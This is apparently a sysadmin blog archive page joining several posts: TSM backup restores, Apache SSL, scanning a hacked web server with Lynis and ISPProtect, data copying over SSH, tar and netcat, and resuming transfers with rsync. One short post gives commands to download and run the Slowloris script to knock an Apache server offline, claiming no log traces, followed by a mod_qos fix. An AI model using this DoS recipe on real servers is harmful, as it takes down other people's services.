tsm> rest D:\*   D:\RESTORE\    -su=yes 
 

 

  • Restore user /home/* to /scratch on ** Mac, Unix/Linux

 

tsm> rest /home/* /scratch/     -su=yes  
 

 

  • Restoring Tivoli data on old netware

 

tsm> rest SOURCE-SERVER\USR:*  USR:restore/   -su=yes  ** Netware

 

12. Adding more directories for incremental backup / Check whether TSM backup was done correctly?

The easiest way is to check the produced dschmed.log if everything is okay there should be records in the log that Tivoli backup was scheduled in a some hours time
succesfully.
A normally produced backup scheduled in log should look something like:

 

14-03-2020 23:03:04 — SCHEDULEREC STATUS BEGIN
14-03-2020 23:03:04 Total number of objects inspected:   91,497
14-03-2020 23:03:04 Total number of objects backed up:      113
14-03-2020 23:03:04 Total number of objects updated:          0
14-03-2020 23:03:04 Total number of objects rebound:          0
14-03-2020 23:03:04 Total number of objects deleted:          0
14-03-2020 23:03:04 Total number of objects expired:         53
14-03-2020 23:03:04 Total number of objects failed:           6
14-03-2020 23:03:04 Total number of bytes transferred:    19.38 MB
14-03-2020 23:03:04 Data transfer time:                    1.54 sec
14-03-2020 23:03:04 Network data transfer rate:        12,821.52 KB/sec
14-03-2020 23:03:04 Aggregate data transfer rate:        114.39 KB/sec
14-03-2020 23:03:04 Objects compressed by:                    0%
14-03-2020 23:03:04 Elapsed processing time:           00:02:53
14-03-2020 23:03:04 — SCHEDULEREC STATUS END
14-03-2020 23:03:04 — SCHEDULEREC OBJECT END WEEKLY_23_00 14-12-2010 23:00:00
14-03-2020 23:03:04 Scheduled event 'WEEKLY_23_00' completed successfully.
14-03-2020 23:03:04 Sending results for scheduled event 'WEEKLY_23_00'.
14-03-2020 23:03:04 Results sent to server for scheduled event 'WEEKLY_23_00'.

 

in case of errors you should check dsmerror.log
 

Conclusion


In this article I've briefly evaluated some basics of IBM Commercial Tivoli Storage Manager (TSM) to be able to  list backups, check backup schedules and how to the files set to be
excluded from a backup location and most importantly how to check that data backed up data is in a good shape and accessible.
It was explained how backups can be restored on a local and remote machine as well as how to  append new files to be set for backup on next incremental scheduled backup.
It was shown how the pick interactive cli interface could be used to restore files at a certain data back in time as well as how full partitions can be restored and how some
certain file could be retrieved from the TSM data copy.

Run Apache with SSL Self Signed SSL Certificate

Friday, August 14th, 2009

Recently I had to run apache on Debian 4.0 (Edge) with Self Signed certificate.To make it happen I had to Google around and try out stuff. I've red that Debiancomes with a command (apache2-ssl-certificate) that generates a self signed openssl certificate.However on my Debian systems this cmd wasn't available. So I had to google around about it,and I came along the following website which provided mewith the script itself and some instructions how to use it. I've modified a bit the archive mentionedon the above website to make the install instructions of the website through a script. I've built a newarchive based on the archive apache2-ssl.tar.gz that includes an extra file runme.sh which does the properinstallation for you. The new archive itself could be found here .

In the mean time I recommend you read my article explaining how to quickly and efficiently generate self-signed certificate with openssl command on GNU / Linux and BSD

END—–

Tools to scan a Linux / Unix Web server for Malware and Rootkits / Lynis and ISPProtect – clean Joomla / WordPress and other CMS for malware and malicious scripts and trojan codes

Monday, March 14th, 2016

Linux-BSD-Unix-Rootkit-Malware-XSS-Injection-spammer-scripts-clean-howto-manual

If you have been hacked or have been suspicious that someone has broken up in some of the shared web hosting servers you happent o manage you already probably have tried the server with rkhuter, chroot and unhide tools which gives a general guidance where a server has been compromised

However with the evolution of hacking tools out there and the boom of Web security XSS / CSS / Database injections and PHP scripts vulnerability catching an intruder especially spammers has been becoming more and more hard to achieve.

Just lately a mail server of mine's load avarage increased about 10 times, and the CPU's and HDD I/O load jump over the sky.
I started evaluating the situation to find out what exactly went wrong with the machine, starting with a hardware analysis tools and a physical check up whether all was fine with the hardware Disks / Ram etc. just to find out the machine's hardware was working perfect.
I've also thoroughfully investigated on Logs of Apache, MySQL, TinyProxy and Tor server and bind DNS and DJBDns  which were happily living there for quite some time but didn't found anything strange.

Not on a last place I investigated TOP processes (with top command) and iostat  and realized the CPU high burst lays in exessive Input / Output of Hard Drive. Checking the Qmail Mail server logs and the queue with qmail-qstat was a real surprise for me as on the queue there were about 9800 emails hanging unsent, most of which were obviously a spam, so I realized someone was heavily spamming through the server and started more thoroughfully investigating ending up to a WordPress Blog temp folder (writtable by all system users) which was existing under a Joomla directory infrastructure, so I guess someone got hacked through the Joomla and uploaded the malicious php spammer script to the WordPress blog. I've instantly stopped and first chmod 000 to stop being execuded and after examing deleted view73.php, javascript92.php and index8239.php which were full of PHP values with binary encoded values and one was full of encoded strings which after being decoding were actually the recepient's spammed emails.
BTW, the view*.php javascript*.php and index*.php files were owned by www-data (the user with which Apache was owned), so obviously someone got hacked through some vulnerable joomla or wordpress script (as joomla there was quite obscure version 1.5 – where currently Joomla is at version branch 3.5), hence my guess is the spamming script was uploaded through Joomla XSS vulnerability).

As I was unsure wheteher the scripts were not also mirrored under other subdirectories of Joomla or WP Blog I had to scan further to check whether there are no other scripts infected with malware or trojan spammer codes, webshells, rootkits etc.
And after some investigation, I've actually caught the 3 scripts being mirrored under other webside folders with other numbering on filename view34.php javascript72.php, index8123.php  etc..

I've used 2 tools to scan and catch malware the trojan scripts and make sure no common rootkit is installed on the server.

1. Lynis (to check for rootkits)
2. ISPProtect (Proprietary but superb Website malware scanner with a free trial)

1. Lynis – Universal security auditing tool and rootkit scanner

Lynis is actually the well known rkhunter, I've used earlier to check servers BSD and Linux servers for rootkits.
To have up-to-date version of Lynis, I've installed it from source:
 

cd /tmp
wget https://cisofy.com/files/lynis-2.1.1.tar.gz
tar xvfz lynis-2.1.1.tar.gz
mv lynis /usr/local/
ln -s /usr/local/lynis/lynis /usr/local/bin/lynis

 


Then to scan the server for rootkits, first I had to update its malware definition database with:
 

lynis update info


Then to actually scan the system:
 

lynis audit system


Plenty of things will be scanned but you will be asked on a multiple times whether you would like to conduct different kind fo system services and log files, loadable kernel module rootkits and  common places to check for installed rootkits or server placed backdoors. That's pretty annoying as you will have to press Enter on a multiple times.

lynis-asking-to-scan-for-rootkits-backdoors-and-malware-your-linux-freebsd-netbsd-unix-server

Once scan is over you will get a System Scan Summary like in below screenshot:

lynis-scanned-server-for-rootkit-summer-results-linux-check-for-backdoors-tool

Lynis suggests also a very good things that might be tampered to make the system more secure, so using some of its output when I have time I'll work out on hardening all servers.

To prevent further incidents and keep an eye on servers I've deployed Lynis scan via cron job once a month on all servers, I've placed under a root cronjob on every first dae of month in following command:

 

 

server:~# crontab -u root -e
0 3 1 * * /usr/local/bin/lynis –quick 2>&1 | mail -s "lynis output of my server" admin-mail@my-domain.com)

 

2. ISPProtect – Website malware scanner

ISPProtect is a malware scanner for web servers, I've used it to scan all installed  CMS systems like WordPress, Joomla, Drupal etc.
ISPProtect is great for PHP / Pyhon / Perl and other CMS based frameworks.
ISPProtect contains 3 scanning engines: a signature based malware scanner, a heuristic malware scanner, and a scanner to show the installation directories of outdated CMS systems.
Unfortunately it is not free software, but I personally used the FREE TRIAL option  which can be used without registration to test it or clean an infected system.
I first webserver first locally for the infected site and then globally for all the other shared hosting websites.

As I wanted to check also rest of hosted websites, I've run ISPProtect over the all bunch of installed websites.
Pre-requirement of ISPProtect is to have a working PHP Cli and Clamav Anti-Virus installed on the server thus on RHEL (RPM) based servers make sure you have it installed if not:
 

server:~# yum -y install php

server:~# yum -y install clamav


Debian based Linux servers web hosting  admins that doesn't have php-cli installed should run:
 

server:~# apt-get install php5-cli

server:~# apt-get install clamav


Installing ISPProtect from source is with:

mkdir -p /usr/local/ispprotect
chown -R root:root /usr/local/ispprotect
chmod -R 750 /usr/local/ispprotect
cd /usr/local/ispprotect
wget http://www.ispprotect.com/download/ispp_scan.tar.gz
tar xzf ispp_scan.tar.gz
rm -f ispp_scan.tar.gz
ln -s /usr/local/ispprotect/ispp_scan /usr/local/bin/ispp_scan

 

To initiate scan with ISPProtect just invoke it:
 

server:~# /usr/local/bin/ispp_scan

 

ispprotect-scan-websites-for-malware-and-infected-with-backdoors-or-spamming-software-source-code-files

I've used it as a trial

Please enter scan key:  trial
Please enter path to scan: /var/www

You will be shown the scan progress, be patient because on a multiple shared hosting servers with few hundred of websites.
The tool will take really, really long so you might need to leave it for 1 hr or even more depending on how many source files / CSS / Javascript etc. needs to be scanned.

Once scan is completed scan and infections found logs will be stored under /usr/local/ispprotect, under separate files for different Website Engines and CMSes:

After the scan is completed, you will find the results also in the following files:
 

Malware => /usr/local/ispprotect/found_malware_20161401174626.txt
Wordpress => /usr/local/ispprotect/software_wordpress_20161401174626.txt
Joomla => /usr/local/ispprotect/software_joomla_20161401174626.txt
Drupal => /usr/local/ispprotect/software_drupal_20161401174626.txt
Mediawiki => /usr/local/ispprotect/software_mediawiki_20161401174626.txt
Contao => /usr/local/ispprotect/software_contao_20161401174626.txt
Magentocommerce => /usr/local/ispprotect/software_magentocommerce_20161401174626.txt
Woltlab Burning Board => /usr/local/ispprotect/software_woltlab_burning_board_20161401174626.txt
Cms Made Simple => /usr/local/ispprotect/software_cms_made_simple_20161401174626.txt
Phpmyadmin => /usr/local/ispprotect/software_phpmyadmin_20161401174626.txt
Typo3 => /usr/local/ispprotect/software_typo3_20161401174626.txt
Roundcube => /usr/local/ispprotect/software_roundcube_20161401174626.txt


ISPProtect is really good in results is definitely the best malicious scripts / trojan / trojan / webshell / backdoor / spammer (hacking) scripts tool available so if your company could afford it you better buy a license and settle a periodic cron job scan of all your servers, like lets say:

 

server:~# crontab -u root -e
0 3  1 * *   /usr/local/ispprotect/ispp_scan –update && /usr/local/ispprotect/ispp_scan –path=/var/www –email-results=admin-email@your-domain.com –non-interactive –scan-key=AAA-BBB-CCC-DDD


Unfortunately ispprotect is quite expensive so I guess most small and middle sized shared hosting companies will be unable to afford it.
But even for a one time run this tools worths the try and will save you an hours if not days of system investigations.
I'll be glad to hear from readers if aware of any available free software alternatives to ISPProtect. The only one I am aware is Linux Malware Detect (LMD).
I've used LMD in the past but as of time of writting this article it doesn't seems working any more so I guess the tool is currently unsupported / obsolete.

 

Apache Denial of Service (DoS) attack with Slowris / Crashing Apache

Monday, February 1st, 2010

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a succesful denial of service to
most of the running web servers out there. The tools is called slowris
For any further information there is the following publication on ha.ckers.org about slowris
The original article of the friend of mine is located on his (mpetrov.net) person blog .
Unfortunately the post is in Bulgarian so it’s not a match for English speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go the Apache server is not responding, no-traces of the DoS are left on the server,
the log file is completely clear of records!
;The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.cThe module is installing to "/usr/lib/apache2/modules"All left is configuring the module
# cd /etc/apache2/mods-available/
#vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.

How to Copy large data directories between 2 Linux / Unix servers without direct ssh / ftp access between server1 and server2 other by using SSH, TAR and Unix pipes

Monday, April 27th, 2015

how-to-copy-large-data-directories-between-2-linux-unix-servers-without-direct-ssh-ftp-access-btween-each-other

In a Web application data migration project, I've come across a situation where I have to copy / transfer 500 Gigabytes of data from Linux server 1 (host A) to Linux server 2 (host B). However the two machines doesn't have direct access to each other (via port 22) for security reasons and hence I cannot use sshfs to mount remotely host dir via ssh and copy files like local ones.

As this is a data migration project its however necessery to migrate the data finding a way … Normal way companies do it is to copy the data to External Hard disk storage and send it via some Country Post services or some employee being send in Data center to attach the SAN to new server where data is being migrated However in my case this was not possible so I had to do it different.

I have access to both servers as they're situated in the same Corporate DMZ network and I can thus access both UNIX machines via SSH.

Thanksfully there is a small SSH protocol + TAR archiver and default UNIX pipe's capabilities hack that makes possible to transfer easy multiple (large) files and directories. The only requirement to use this nice trick is to have SSH client installed on the middle host from which you can access via SSH protocol Server1 (from where data is migrated) and Server2 (where data will be migrated).

If the hopping / jump server from which you're allowed to have access to Linux  servers Server1 and Server2 is not Linux and you're missing the SSH client and don't have access on Win host to install anything on it just use portable mobaxterm (as it have Cygwin SSH client embedded )

Here is how:
 

jump-host:~$ ssh server1 "tar czf – /somedir/" | pv | ssh server2 "cd /somedir/; tar xf


As you can see from above command line example an SSH is made to server1  a tar is used to archive the directory / directories containing my hundred of gigabytes and then this is passed to another opened ssh session to server 2  via UNIX Pipe mechanism and then TAR archiver is used second time to unarchive previously passed archived content. pv command which is in the middle is not obligitory though it is a nice way to monitor status about data transfer like below:
 

500GB 0:00:01 [10,5MB/s] [===================================================>] 27%


P.S. If you don't have PV installed install it either with apt-get on Debian:

 

debian:~# apt-get install –yes pv

 

Or on CentOS / Fedora / RHEL etc.

 

[root@centos ~]# yum -y install pv

 

Below is a small chunk of PV manual to give you better idea of what it does:

NAME
       pv – monitor the progress of data through a pipe

SYNOPSIS
       pv [OPTION] [FILE]…
       pv [-h|-V]

DESCRIPTION
       pv  allows  a  user to see the progress of data through a pipeline, by giving information such as time elapsed, percentage
       completed (with progress bar), current throughput rate, total data transferred, and ETA.

       To use it, insert it in a pipeline between two processes, with the appropriate options.  Its standard input will be passed
       through to its standard output and progress will be shown on standard error.

       pv  will  copy  each  supplied FILE in turn to standard output (- means standard input), or if no FILEs are specified just
       standard input is copied. This is the same behaviour as cat(1).

       A simple example to watch how quickly a file is transferred using nc(1):

              pv file | nc -w 1 somewhere.com 3000

       A similar example, transferring a file from another process and passing the expected size to pv:

              cat file | pv -s 12345 | nc -w 1 somewhere.com 3000


Note that with too big file transfers using PV will delay data transfer because everything will have to pass through another 2 pipes, however for file transfers up to few gigabytes its really nice to include it.

If you only need to transfer huge .tar.gz archive and you don't bother about traffic security (i.e. don't care whether transferred traffic is going through encrypted SSH tunnel and don't want to put an overhead to both systems for encrypting the data and you have some unfiltered ports between host 1 and host 2 you can run netcat on host 2 to listen for connections and forward .tar.gz content via netcat's port like so:
 

linux2:~$ nc -l -p 12345 > /path/destinationfile
linux2:~$ cat /path/sourcfile | nc desti.nation.ip.address 12345


Another way to transfer large data without having connection with server1 and server2 but having connection to a third host PC is to use rsync and good old SSH Tunneling, like so:
 

jump-host:~$ ssh -R 2200:Linux-server1:22 root@Linux-server2 "rsync -e 'ssh -p 2200' –stats –progress -vaz /directory/to/copy root@localhost:/copy/destination/dir"

Resume sftp / scp cancelled (interrupted) network transfer – Continue (large) partially downloaded files on Linux / Windows

Thursday, April 23rd, 2015

resume-sftp-scp-cancelled-interrupted-file-transfer-download-upload-network-transfer-continue-large-partially-downloaded-file-howto-linux-windows
I've recentely have a task to transfer some huge Application server long time stored data (about 70GB) of data after being archived between an old Linux host server and a new one to where the new Tomcat Application (Linux) server will be installed to fit the increased sites accessibility (server hardware overload).

The two systems are into a a paranoid DMZ network and does not have access between each other via SSH / FTP / FTPs and even no Web Access on port (80 or SSL – 443) between the two hosts, so in order to move the data I had to use a third HOP station Windows (server) which have a huge SAN network attached storage of 150 TB (as a Mapped drive I:/).

On the Windows HOP station which is giving me access via Citrix Receiver to the DMZ-ed network I'm using mobaxterm so I have the basic UNIX commands such as sftp / scp already existing on the Windows system via it.
Thus to transfer the Chronos Tomcat application stored files .tar.gz archived I've sftp-ed into the Linux host and used get command to retrieve it, e.g.:

 

sftp UserName@Linux-server.net
Password:
Connected to Linux-server.
sftp> get Chronos_Application_23_04_2015.tar.gz

….


The Secured DMZ Network seemed to have a network shaper limiting my get / Secured SCP download to be at 2.5MBytes / sec, thus the overall file transfer seemed to require a lot of time about 08:30 hours to complete. As it was the middle of day about 13:00 and my work day ends at 18:00 (this meant I would be able to keep the file retrieval session for a maximum of 5 hrs) and thus file transfer would cancel when I logout of the HOP station (after 18:00). However I've already left the file transfer to continue for 2hrs and thus about 23% of file were retrieved, thus I wondered whether SCP / SFTP Protocol file downloads could be resumed. I've checked thoroughfully all the options within sftp (interactive SCP client) and the scp command manual itself however none of it doesn't have a way to do a resume option. Then I thought for a while what I can use to continue the interrupted download and I remembered good old rsync (versatile remote and local file copying tool) which I often use to create customer backup stragies has the ability to resume partially downloaded files I wondered whether this partially downloaded file resume could be done only if file transfer was only initiated through rsync itself and luckily rsync is able to continue interrupted file transfers no matter what kind of HTTP / HTTPS / SCP / FTP program was used to start file retrievalrsync is able to continue cancelled / failed transfer due to network problems or user interaction activity), that turned even pretty easy to continue failed file transfer download from where it was interrupted I had to change to directory where file is located:
 

cd /path/to/interrupted_file/


and issue command:
 

rsync -av –partial username@Linux-server.net:/path/to/file .


the –partial option is the one that does the file resume trick, -a option stands for –archive and turns on the archive mode; equals -rlptgoD (no -H,-A,-X) arguments and -v option shows a file transfer percantage status line and an avarage estimated time for transfer to complete, an easier to remember rsync resume is like so:
 

rsync -avP username@Linux-server.net:/path/to/file .
Password:
receiving incremental file list
chronos_application_23_04_2015.tar.gz
  4364009472   8%    2.41MB/s    5:37:34

To continue a failed file upload with rsync (e.g. if you used sftp put command and the upload transfer failed or have been cancalled:
 

rsync -avP chronos_application_23_04_2015.tar.gz username@Linux-server.net:/path/where_to/upload


Of course for the rsync resume to work remote Linux system had installed rsync (package), if rsync was not available on remote system this would have not work, so before using this method make sure remote Linux / Windows server has rsync installed. There is an rsync port also for Windows so to resume large Giga or Terabyte file archive downloads easily between two Windows hosts use cwRsync.